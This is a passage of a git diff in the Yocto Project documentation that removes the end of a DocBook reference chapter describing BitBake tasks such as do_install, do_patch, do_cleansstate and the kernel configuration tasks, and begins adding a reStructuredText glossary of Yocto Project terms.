- to the <filename>addtask</filename> command (though it is
- harmless), because the
- <link linkend='ref-classes-base'><filename>base</filename></link>
- class contains the following:
- <literallayout class='monospaced'>
- do_build[recrdeptask] += "do_deploy"
- </literallayout>
- See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
- section in the BitBake User Manual for more information.
- </note>
- </para>
-
- <para>
- If the <filename>do_deploy</filename> task re-executes, any
- previous output is removed (i.e. "cleaned").
- </para>
- </section>
-
- <section id='ref-tasks-fetch'>
- <title><filename>do_fetch</filename></title>
-
- <para>
- Fetches the source code.
- This task uses the
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- variable and the argument's prefix to determine the correct
- <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>
- module.
- </para>
- </section>
-
- <section id='ref-tasks-image'>
- <title><filename>do_image</filename></title>
-
- <para>
- Starts the image generation process.
- The <filename>do_image</filename> task runs after the
- OpenEmbedded build system has run the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task during which packages are identified for installation into
- the image and the root filesystem is created, complete with
- post-processing.
- </para>
-
- <para>
- The <filename>do_image</filename> task performs pre-processing
- on the image through the
- <link linkend='var-IMAGE_PREPROCESS_COMMAND'><filename>IMAGE_PREPROCESS_COMMAND</filename></link>
- and dynamically generates supporting
- <filename>do_image_*</filename> tasks as needed.
- </para>
-
- <para>
- For more information on image creation, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-image-complete'>
- <title><filename>do_image_complete</filename></title>
-
- <para>
- Completes the image generation process.
- The <filename>do_image_complete</filename> task runs after the
- OpenEmbedded build system has run the
- <link linkend='ref-tasks-image'><filename>do_image</filename></link>
- task during which image pre-processing occurs and through
- dynamically generated <filename>do_image_*</filename> tasks the
- image is constructed.
- </para>
-
- <para>
- The <filename>do_image_complete</filename> task performs
- post-processing on the image through the
- <link linkend='var-IMAGE_POSTPROCESS_COMMAND'><filename>IMAGE_POSTPROCESS_COMMAND</filename></link>.
- </para>
-
- <para>
- For more information on image creation, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-install'>
- <title><filename>do_install</filename></title>
-
- <para>
- Copies files that are to be packaged into the holding area
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>.
- This task runs with the current working directory set to
- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>,
- which is the compilation directory.
- The <filename>do_install</filename> task, as well as other tasks
- that either directly or indirectly depend on the installed files
- (e.g.
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>,
- <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>,
- and
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>),
- run under
- <ulink url='&YOCTO_DOCS_OM_URL;#fakeroot-and-pseudo'>fakeroot</ulink>.
- <note>
- <title>Caution</title>
-
- <para>
- When installing files, be careful not to set the owner and
- group IDs of the installed files to unintended values.
- Some methods of copying files, notably when using the
- recursive <filename>cp</filename> command, can preserve the
- UID and/or GID of the original file, which is usually not
- what you want.
- The
- <link linkend='insane-host-user-contaminated'><filename>host-user-contaminated</filename></link>
- QA check checks for files that probably have the wrong
- ownership.
- </para>
-
- <para>
- Safe methods for installing files include the following:
- <itemizedlist>
- <listitem><para>
- The <filename>install</filename> utility.
- This utility is the preferred method.
- </para></listitem>
- <listitem><para>
- The <filename>cp</filename> command with the
- "--no-preserve=ownership" option.
- </para></listitem>
- <listitem><para>
- The <filename>tar</filename> command with the
- "--no-same-owner" option.
- See the <filename>bin_package.bbclass</filename>
- file in the <filename>meta/classes</filename>
- directory of the
- <link linkend='source-directory'>Source Directory</link>
- for an example.
- </para></listitem>
- </itemizedlist>
- </para>
- </note>
- </para>
- </section>
-
- <section id='ref-tasks-install_ptest_base'>
- <title><filename>do_install_ptest_base</filename></title>
-
- <para>
- Copies the runtime test suite files from the compilation directory
- to a holding area.
- </para>
- </section>
-
- <section id='ref-tasks-package'>
- <title><filename>do_package</filename></title>
-
- <para>
- Analyzes the content of the holding area
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
- and splits the content into subsets based on available packages
- and files.
- This task makes use of the
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- and
- <link linkend='var-FILES'><filename>FILES</filename></link>
- variables.
- </para>
-
- <para>
- The <filename>do_package</filename> task, in conjunction with the
- <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
- task, also saves some important package metadata.
- For additional information, see the
- <link linkend='var-PKGDESTWORK'><filename>PKGDESTWORK</filename></link>
- variable and the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-package_qa'>
- <title><filename>do_package_qa</filename></title>
-
- <para>
- Runs QA checks on packaged files.
- For more information on these checks, see the
- <link linkend='ref-classes-insane'><filename>insane</filename></link>
- class.
- </para>
- </section>
-
- <section id='ref-tasks-package_write_deb'>
- <title><filename>do_package_write_deb</filename></title>
-
- <para>
- Creates Debian packages (i.e. <filename>*.deb</filename> files) and
- places them in the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></link><filename>}</filename>
- directory in the package feeds area.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-package_write_ipk'>
- <title><filename>do_package_write_ipk</filename></title>
-
- <para>
- Creates IPK packages (i.e. <filename>*.ipk</filename> files) and
- places them in the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></link><filename>}</filename>
- directory in the package feeds area.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-package_write_rpm'>
- <title><filename>do_package_write_rpm</filename></title>
-
- <para>
- Creates RPM packages (i.e. <filename>*.rpm</filename> files) and
- places them in the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></link><filename>}</filename>
- directory in the package feeds area.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-package_write_tar'>
- <title><filename>do_package_write_tar</filename></title>
-
- <para>
- Creates tarballs and places them in the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></link><filename>}</filename>
- directory in the package feeds area.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='ref-tasks-packagedata'>
- <title><filename>do_packagedata</filename></title>
-
- <para>
- Saves package metadata generated by the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task in
- <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
- to make it available globally.
- </para>
- </section>
-
- <section id='ref-tasks-patch'>
- <title><filename>do_patch</filename></title>
-
- <para>
- Locates patch files and applies them to the source code.
- </para>
-
- <para>
- After fetching and unpacking source files, the build system
- uses the recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements to locate and apply patch files to the source code.
- <note>
- The build system uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable to determine the default set of directories when
- searching for patches.
- </note>
- Patch files, by default, are <filename>*.patch</filename> and
- <filename>*.diff</filename> files created and kept in a
- subdirectory of the directory holding the recipe file.
- For example, consider the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-connectivity/bluez5'><filename>bluez5</filename></ulink>
- recipe from the OE-Core layer (i.e.
- <filename>poky/meta</filename>):
- <literallayout class='monospaced'>
- poky/meta/recipes-connectivity/bluez5
- </literallayout>
- This recipe has two patch files located here:
- <literallayout class='monospaced'>
- poky/meta/recipes-connectivity/bluez5/bluez5
- </literallayout>
- </para>
-
- <para>
- In the <filename>bluez5</filename> recipe, the
- <filename>SRC_URI</filename> statements point to the source and
- patch files needed to build the package.
- <note>
- In the case for the <filename>bluez5_5.48.bb</filename>
- recipe, the <filename>SRC_URI</filename> statements are from an
- include file <filename>bluez5.inc</filename>.
- </note>
- </para>
-
- <para>
- As mentioned earlier, the build system treats files whose file
- types are <filename>.patch</filename> and
- <filename>.diff</filename> as patch files.
- However, you can use the "apply=yes" parameter with the
- <filename>SRC_URI</filename> statement to indicate any file as a
- patch file:
- <literallayout class='monospaced'>
- SRC_URI = " \
- git://<replaceable>path_to_repo</replaceable>/<replaceable>some_package</replaceable> \
- file://<replaceable>file</replaceable>;apply=yes \
- "
- </literallayout>
- </para>
-
- <para>
- Conversely, if you have a directory full of patch files and you
- want to exclude some so that the <filename>do_patch</filename>
- task does not apply them during the patch phase, you can use
- the "apply=no" parameter with the <filename>SRC_URI</filename>
- statement:
- <literallayout class='monospaced'>
- SRC_URI = " \
- git://<replaceable>path_to_repo</replaceable>/<replaceable>some_package</replaceable> \
- file://<replaceable>path_to_lots_of_patch_files</replaceable> \
- file://<replaceable>path_to_lots_of_patch_files</replaceable>/<replaceable>patch_file5</replaceable>;apply=no \
- "
- </literallayout>
- In the previous example, assuming all the files in the directory
- holding the patch files end with either <filename>.patch</filename>
- or <filename>.diff</filename>, every file would be applied as a
- patch by default except for the
- <replaceable>patch_file5</replaceable> patch.
- </para>
-
- <para>
- You can find out more about the patching process in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>Patching</ulink>"
- section in the Yocto Project Overview and Concepts Manual and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='ref-tasks-populate_lic'>
- <title><filename>do_populate_lic</filename></title>
-
- <para>
- Writes license information for the recipe that is collected later
- when the image is constructed.
- </para>
- </section>
-
- <section id='ref-tasks-populate_sdk'>
- <title><filename>do_populate_sdk</filename></title>
-
- <para>
- Creates the file and directory structure for an installable SDK.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-generation-dev-environment'>SDK Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual for more
- information.
- </para>
- </section>
-
- <section id='ref-tasks-populate_sysroot'>
- <title><filename>do_populate_sysroot</filename></title>
-
- <para>
- Stages (copies) a subset of the files installed by the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task into the appropriate sysroot.
- For information on how to access these files from other recipes,
- see the
- <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR*</filename></link>
- variables.
- Directories that would typically not be needed by other recipes at
- build time (e.g. <filename>/etc</filename>) are not copied by
- default.
- </para>
-
- <para>
- For information on what directories are copied by default, see the
- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS*</filename></link>
- variables.
- You can change these variables inside your recipe if you need
- to make additional (or fewer) directories available to other
- recipes at build time.
- </para>
-
- <para>
- The <filename>do_populate_sysroot</filename> task is a
- shared state (sstate) task, which means that the task can
- be accelerated through sstate use.
- Realize also that if the task is re-executed, any previous output
- is removed (i.e. "cleaned").
- </para>
- </section>
-
- <section id='ref-tasks-prepare_recipe_sysroot'>
- <title><filename>do_prepare_recipe_sysroot</filename></title>
-
- <para>
- Installs the files into the individual recipe specific sysroots
- (i.e. <filename>recipe-sysroot</filename> and
- <filename>recipe-sysroot-native</filename> under
- <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}</filename>
- based upon the dependencies specified by
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>).
- See the
- "<link linkend='ref-classes-staging'><filename>staging</filename></link>"
- class for more information.
- </para>
- </section>
-
- <section id='ref-tasks-rm_work'>
- <title><filename>do_rm_work</filename></title>
-
- <para>
- Removes work files after the OpenEmbedded build system has
- finished with them.
- You can learn more by looking at the
- "<link linkend='ref-classes-rm-work'><filename>rm_work.bbclass</filename></link>"
- section.
- </para>
- </section>
-
- <section id='ref-tasks-unpack'>
- <title><filename>do_unpack</filename></title>
-
- <para>
- Unpacks the source code into a working directory pointed to
- by
- <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}</filename>.
- The
- <link linkend='var-S'><filename>S</filename></link> variable also
- plays a role in where unpacked source files ultimately reside.
- For more information on how source files are unpacked, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#source-fetching-dev-environment'>Source Fetching</ulink>"
- section in the Yocto Project Overview and Concepts Manual and also
- see the <filename>WORKDIR</filename> and
- <filename>S</filename> variable descriptions.
- </para>
- </section>
-</section>
-
-<section id='manually-called-tasks'>
- <title>Manually Called Tasks</title>
-
- <para>
- These tasks are typically manually triggered (e.g. by using the
- <filename>bitbake -c</filename> command-line option):
- </para>
-
- <section id='ref-tasks-checkpkg'>
- <title><filename>do_checkpkg</filename></title>
-
- <para>
- Provides information about the recipe including its upstream
- version and status.
- The upstream version and status reveals whether or not a version
- of the recipe exists upstream and a status of not updated, updated,
- or unknown.
- </para>
-
- <para>
- To check the upstream version and status of a recipe, use the
- following devtool commands:
- <literallayout class='monospaced'>
- $ devtool latest-version
- $ devtool check-upgrade-status
- </literallayout>
- See the
- "<link linkend='ref-devtool-reference'><filename>devtool</filename> Quick Reference</link>"
- chapter for more information on <filename>devtool</filename>.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</ulink>"
- section for information on checking the upgrade status of a recipe.
- </para>
-
- <para>
- To build the <filename>checkpkg</filename> task, use the
- <filename>bitbake</filename> command with the "-c" option and
- task name:
- <literallayout class='monospaced'>
- $ bitbake core-image-minimal -c checkpkg
- </literallayout>
- By default, the results are stored in
- <link linkend='var-LOG_DIR'><filename>$LOG_DIR</filename></link>
- (e.g. <filename>$BUILD_DIR/tmp/log</filename>).
- </para>
- </section>
-
- <section id='ref-tasks-checkuri'>
- <title><filename>do_checkuri</filename></title>
-
- <para>
- Validates the
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- value.
- </para>
- </section>
-
- <section id='ref-tasks-clean'>
- <title><filename>do_clean</filename></title>
-
- <para>
- Removes all output files for a target from the
- <link linkend='ref-tasks-unpack'><filename>do_unpack</filename></link>
- task forward (i.e. <filename>do_unpack</filename>,
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>,
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>,
- and
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>).
- </para>
-
- <para>
- You can run this task using BitBake as follows:
- <literallayout class='monospaced'>
- $ bitbake -c clean <replaceable>recipe</replaceable>
- </literallayout>
- </para>
-
- <para>
- Running this task does not remove the
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>
- cache files.
- Consequently, if no changes have been made and the recipe is
- rebuilt after cleaning, output files are simply restored from the
- sstate cache.
- If you want to remove the sstate cache files for the recipe,
- you need to use the
- <link linkend='ref-tasks-cleansstate'><filename>do_cleansstate</filename></link>
- task instead (i.e. <filename>bitbake -c cleansstate</filename> <replaceable>recipe</replaceable>).
- </para>
- </section>
-
- <section id='ref-tasks-cleanall'>
- <title><filename>do_cleanall</filename></title>
-
- <para>
- Removes all output files, shared state
- (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
- cache, and downloaded source files for a target (i.e. the contents
- of
- <link linkend='var-DL_DIR'><filename>DL_DIR</filename></link>).
- Essentially, the <filename>do_cleanall</filename> task is
- identical to the
- <link linkend='ref-tasks-cleansstate'><filename>do_cleansstate</filename></link>
- task with the added removal of downloaded source files.
- </para>
-
- <para>
- You can run this task using BitBake as follows:
- <literallayout class='monospaced'>
- $ bitbake -c cleanall <replaceable>recipe</replaceable>
- </literallayout>
- </para>
-
- <para>
- Typically, you would not normally use the
- <filename>cleanall</filename> task.
- Do so only if you want to start fresh with the
- <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>
- task.
- </para>
- </section>
-
- <section id='ref-tasks-cleansstate'>
- <title><filename>do_cleansstate</filename></title>
-
- <para>
- Removes all output files and shared state
- (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
- cache for a target.
- Essentially, the <filename>do_cleansstate</filename> task is
- identical to the
- <link linkend='ref-tasks-clean'><filename>do_clean</filename></link>
- task with the added removal of shared state
- (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
- cache.
- </para>
-
- <para>
- You can run this task using BitBake as follows:
- <literallayout class='monospaced'>
- $ bitbake -c cleansstate <replaceable>recipe</replaceable>
- </literallayout>
- </para>
-
- <para>
- When you run the <filename>do_cleansstate</filename> task,
- the OpenEmbedded build system no longer uses any
- sstate.
- Consequently, building the recipe from scratch is guaranteed.
- <note>
- The <filename>do_cleansstate</filename> task cannot remove
- sstate from a remote sstate mirror.
- If you need to build a target from scratch using remote
- mirrors, use the "-f" option as follows:
- <literallayout class='monospaced'>
- $ bitbake -f -c do_cleansstate <replaceable>target</replaceable>
- </literallayout>
- </note>
- </para>
- </section>
-
- <section id='ref-tasks-devpyshell'>
- <title><filename>do_devpyshell</filename></title>
-
- <para>
- Starts a shell in which an interactive Python interpreter allows
- you to interact with the BitBake build environment.
- From within this shell, you can directly examine and set
- bits from the data store and execute functions as if within
- the BitBake environment.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devpyshell'>Using a Development Python Shell</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information about using <filename>devpyshell</filename>.
- </para>
- </section>
-
- <section id='ref-tasks-devshell'>
- <title><filename>do_devshell</filename></title>
-
- <para>
- Starts a shell whose environment is set up for
- development, debugging, or both.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information about using <filename>devshell</filename>.
- </para>
- </section>
-
- <section id='ref-tasks-listtasks'>
- <title><filename>do_listtasks</filename></title>
-
- <para>
- Lists all defined tasks for a target.
- </para>
- </section>
-
- <section id='ref-tasks-package_index'>
- <title><filename>do_package_index</filename></title>
-
- <para>
- Creates or updates the index in the
- <ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>
- area.
- <note>
- This task is not triggered with the
- <filename>bitbake -c</filename> command-line option as
- are the other tasks in this section.
- Because this task is specifically for the
- <filename>package-index</filename> recipe,
- you run it using
- <filename>bitbake package-index</filename>.
- </note>
- </para>
- </section>
-</section>
-
-<section id='image-related-tasks'>
- <title>Image-Related Tasks</title>
-
- <para>
- The following tasks are applicable to image recipes.
- </para>
-
- <section id='ref-tasks-bootimg'>
- <title><filename>do_bootimg</filename></title>
-
- <para>
- Creates a bootable live image.
- See the
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable for additional information on live image types.
- </para>
- </section>
-
- <section id='ref-tasks-bundle_initramfs'>
- <title><filename>do_bundle_initramfs</filename></title>
-
- <para>
- Combines an initial RAM disk (initramfs) image and kernel
- together to form a single image.
- The
- <link linkend='var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></link>
- variable has some more information about these types of images.
- </para>
- </section>
-
- <section id='ref-tasks-rootfs'>
- <title><filename>do_rootfs</filename></title>
-
- <para>
- Creates the root filesystem (file and directory structure) for an
- image.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual for more
- information on how the root filesystem is created.
- </para>
- </section>
-
- <section id='ref-tasks-testimage'>
- <title><filename>do_testimage</filename></title>
-
- <para>
- Boots an image and performs runtime tests within the image.
- For information on automatically testing images, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='ref-tasks-testimage_auto'>
- <title><filename>do_testimage_auto</filename></title>
-
- <para>
- Boots an image and performs runtime tests within the image
- immediately after it has been built.
- This task is enabled when you set
- <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
- equal to "1".
- </para>
-
- <para>
- For information on automatically testing images, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-</section>
-
-<section id='kernel-related-tasks'>
- <title>Kernel-Related Tasks</title>
-
- <para>
- The following tasks are applicable to kernel recipes.
- Some of these tasks (e.g. the
- <link linkend='ref-tasks-menuconfig'><filename>do_menuconfig</filename></link>
- task) are also applicable to recipes that use
- Linux kernel style configuration such as the BusyBox recipe.
- </para>
-
- <section id='ref-tasks-compile_kernelmodules'>
- <title><filename>do_compile_kernelmodules</filename></title>
-
- <para>
- Runs the step that builds the kernel modules (if needed).
- Building a kernel consists of two steps: 1) the kernel
- (<filename>vmlinux</filename>) is built, and 2) the modules
- are built (i.e. <filename>make modules</filename>).
- </para>
- </section>
-
- <section id='ref-tasks-diffconfig'>
- <title><filename>do_diffconfig</filename></title>
-
- <para>
- When invoked by the user, this task creates a file containing the
- differences between the original config as produced by
- <link linkend='ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></link>
- task and the changes made by the user with other methods
- (i.e. using
- (<link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>).
- Once the file of differences is created, it can be used to create
- a config fragment that only contains the differences.
- You can invoke this task from the command line as follows:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c diffconfig
- </literallayout>
- For more information, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-config-fragments'>Creating Configuration Fragments</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para>
- </section>
-
- <section id='ref-tasks-kernel_checkout'>
- <title><filename>do_kernel_checkout</filename></title>
-
- <para>
- Converts the newly unpacked kernel source into a form with which
- the OpenEmbedded build system can work.
- Because the kernel source can be fetched in several different ways,
- the <filename>do_kernel_checkout</filename> task makes sure that
- subsequent tasks are given a clean working tree copy of the kernel
- with the correct branches checked out.
- </para>
- </section>
-
- <section id='ref-tasks-kernel_configcheck'>
- <title><filename>do_kernel_configcheck</filename></title>
-
- <para>
- Validates the configuration produced by the
- <link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>
- task.
- The <filename>do_kernel_configcheck</filename> task produces
- warnings when a requested configuration does not appear in the
- final <filename>.config</filename> file or when you override a
- policy configuration in a hardware configuration fragment.
- You can run this task explicitly and view the output by using
- the following command:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c kernel_configcheck -f
- </literallayout>
- For more information, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#validating-configuration'>Validating Configuration</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para>
- </section>
-
- <section id='ref-tasks-kernel_configme'>
- <title><filename>do_kernel_configme</filename></title>
-
- <para>
- After the kernel is patched by the
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
- task, the <filename>do_kernel_configme</filename> task assembles
- and merges all the kernel config fragments into a merged
- configuration that can then be passed to the kernel configuration
- phase proper.
- This is also the time during which user-specified defconfigs
- are applied if present, and where configuration modes such as
- <filename>--allnoconfig</filename> are applied.
- </para>
- </section>
-
- <section id='ref-tasks-kernel_menuconfig'>
- <title><filename>do_kernel_menuconfig</filename></title>
-
- <para>
- Invoked by the user to manipulate the
- <filename>.config</filename> file used to build a linux-yocto
- recipe.
- This task starts the Linux kernel configuration tool, which you
- then use to modify the kernel configuration.
- <note>
- You can also invoke this tool from the command line as
- follows:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c menuconfig
- </literallayout>
- </note>
- See the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-menuconfig'>Using <filename>menuconfig</filename></ulink>"
- section in the Yocto Project Linux Kernel Development Manual
- for more information on this configuration tool.
- </para>
- </section>
-
- <section id='ref-tasks-kernel_metadata'>
- <title><filename>do_kernel_metadata</filename></title>
-
- <para>
- Collects all the features required for a given kernel build,
- whether the features come from
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- or from Git repositories.
- After collection, the <filename>do_kernel_metadata</filename> task
- processes the features into a series of config fragments and
- patches, which can then be applied by subsequent tasks such as
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
- and
- <link linkend='ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></link>.
- </para>
- </section>
-
- <section id='ref-tasks-menuconfig'>
- <title><filename>do_menuconfig</filename></title>
-
- <para>
- Runs <filename>make menuconfig</filename> for the kernel.
- For information on <filename>menuconfig</filename>, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-menuconfig'>Using&nbsp;&nbsp;<filename>menuconfig</filename></ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para>
- </section>
-
- <section id='ref-tasks-savedefconfig'>
- <title><filename>do_savedefconfig</filename></title>
-
- <para>
- When invoked by the user, creates a defconfig file that can be
- used instead of the default defconfig.
- The saved defconfig contains the differences between the default
- defconfig and the changes made by the user using other methods
- (i.e. the
- <link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>
- task.
- You can invoke the task using the following command:
- <literallayout class='monospaced'>
- $ bitbake linux-yocto -c savedefconfig
- </literallayout>
- </para>
- </section>
-
- <section id='ref-tasks-shared_workdir'>
- <title><filename>do_shared_workdir</filename></title>
-
- <para>
- After the kernel has been compiled but before the kernel modules
- have been compiled, this task copies files required for module
- builds and which are generated from the kernel build into the
- shared work directory.
- With these copies successfully copied, the
- <link linkend='ref-tasks-compile_kernelmodules'><filename>do_compile_kernelmodules</filename></link>
- task can successfully build the kernel modules in the next step
- of the build.
- </para>
- </section>
-
- <section id='ref-tasks-sizecheck'>
- <title><filename>do_sizecheck</filename></title>
-
- <para>
- After the kernel has been built, this task checks the size of the
- stripped kernel image against
- <link linkend='var-KERNEL_IMAGE_MAXSIZE'><filename>KERNEL_IMAGE_MAXSIZE</filename></link>.
- If that variable was set and the size of the stripped kernel
- exceeds that size, the kernel build produces a warning to that
- effect.
- </para>
- </section>
-
- <section id='ref-tasks-strip'>
- <title><filename>do_strip</filename></title>
-
- <para>
- If
- <filename>KERNEL_IMAGE_STRIP_EXTRA_SECTIONS</filename> is defined,
- this task strips the sections named in that variable from
- <filename>vmlinux</filename>.
- This stripping is typically used to remove nonessential sections
- such as <filename>.comment</filename> sections from a
- size-sensitive configuration.
- </para>
- </section>
-
- <section id='ref-tasks-validate_branches'>
- <title><filename>do_validate_branches</filename></title>
-
- <para>
- After the kernel is unpacked but before it is patched, this task
- makes sure that the machine and metadata branches as specified
- by the <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
- variables actually exist on the specified branches.
- If these branches do not exist and
- <link linkend='var-AUTOREV'><filename>AUTOREV</filename></link>
- is not being used, the <filename>do_validate_branches</filename>
- task fails during the build.
- </para>
- </section>
-</section>
-
-<section id='miscellaneous-tasks'>
- <title>Miscellaneous Tasks</title>
-
- <para>
- The following sections describe miscellaneous tasks.
- </para>
-
- <section id='ref-tasks-spdx'>
- <title><filename>do_spdx</filename></title>
-
- <para>
- A build stage that takes the source code and scans it on a remote
- FOSSOLOGY server in order to produce an SPDX document.
- This task applies only to the
- <link linkend='ref-classes-spdx'><filename>spdx</filename></link>
- class.
- </para>
- </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-terms.rst b/documentation/ref-manual/ref-terms.rst
new file mode 100644
index 0000000000..b4ceebc0bb
--- /dev/null
+++ b/documentation/ref-manual/ref-terms.rst
@@ -0,0 +1,394 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+Yocto Project Terms
+*******************
+
+Following is a list of terms and definitions users new to the Yocto Project
+development environment might find helpful. While some of these terms are
+universal, the list includes them just in case:
+
+.. glossary::
+
+ :term:`Append Files`
+ Files that append build information to a recipe file. Append files are
+ known as BitBake append files and ``.bbappend`` files. The OpenEmbedded
+ build system expects every append file to have a corresponding recipe
+ (``.bb``) file. Furthermore, the append file and corresponding recipe file
+ must use the same root filename. The filenames can differ only in the
+ file type suffix used (e.g. ``formfactor_0.0.bb`` and
+ ``formfactor_0.0.bbappend``).
+
+ Information in append files extends or overrides the information in the
+ similarly-named recipe file. For an example of an append file in use, see
+ the ":ref:`dev-manual/dev-manual-common-tasks:Using .bbappend Files in
+ Your Layer`" section in the Yocto Project Development Tasks Manual.
+
+ When you name an append file, you can use the "``%``" wildcard character
